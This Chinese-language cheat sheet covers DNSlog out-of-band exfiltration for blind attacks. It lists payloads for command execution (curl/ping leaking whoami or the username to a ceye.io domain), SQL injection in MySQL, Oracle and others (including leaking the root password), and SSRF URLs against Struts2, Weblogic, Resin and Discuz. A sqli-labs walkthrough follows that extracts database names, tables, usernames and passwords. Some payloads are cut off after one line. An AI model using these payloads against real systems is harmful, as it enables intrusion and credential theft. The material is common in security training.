DNSLOG在盲注中的使用
0x00 Command Execution
i. *nix:
1 | curl http://ip.port.b182oj.ceye.io/`whoami` |
ii. windows
1 | ping %USERNAME%.b182oj.ceye.io |
0x01 SQL Injection
i. SQL Server
1 | DECLARE @host varchar(1024); |
ii. Oracle
1 | SELECT UTL_INADDR.GET_HOST_ADDRESS('ip.port.b182oj.ceye.io'); |
iii. MySQL
1 | SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc')); |
iv. PostgreSQL
1 | DROP TABLE IF EXISTS table_output; |
0x02 XML Entity Injection
1 |
|
0x03 Others
i. Struts2
1 | xx.action?redirect:http://ip.port.b182oj.ceye.io/%25{3*4} |
ii. FFMpeg
1 | #EXTM3U |
iii. Weblogic
1 | xxoo.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://ip.port.b182oj.ceye.io/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search |
iv. ImageMagick
1 | push graphic-context |
v. Resin
1 | xxoo.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://ip.port.b182oj.ceye.io/ssrf |
vi. Discuz
1 | http://xxx.xxxx.com/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://ip.port.b182oj.ceye.io/xx.jpg[/img]&formhash=xxoo |
举例windows下mysql
step2:查询数据库名
1 | http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if((select load_file(concat('\\\\',(select database()),'.lvkais.ceye.io\\abc'))),1,1)--+ |
step3:查询当前数据库中的表
1 | http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if((select load_file(concat('\\\\',(select table_name from information_schema.columns where table_schema='security' limit 0,1),'.lvkais.ceye.io\\abc'))),1,1)--+ |
step4:查询表中的数据
1 | http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if((select load_file(concat('\\\\',(select column_name from information_schema.columns where table_schema=database() and table_name=0x656d61696c73 limit 0,1),'.lvkais.ceye.io\\abc'))),1,1)--+ |
step5:获取字段名(写了三个,分别查和联和在一起查)
1 | http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if((select load_file(concat('\\\\',(select username from users limit 0,1),'.lvkais.ceye.io\\abc'))),1,1)--+ |
1 | http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if((select load_file(concat('\\\\',(select password from users limit 0,1),'.lvkais.ceye.io\\abc'))),1,1)--+ |
1 | http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if((select load_file(concat('\\\\',(select concat(username,0x5f,password) from users limit 0,1),'.lvkais.ceye.io\\abc'))),1,1)--+ |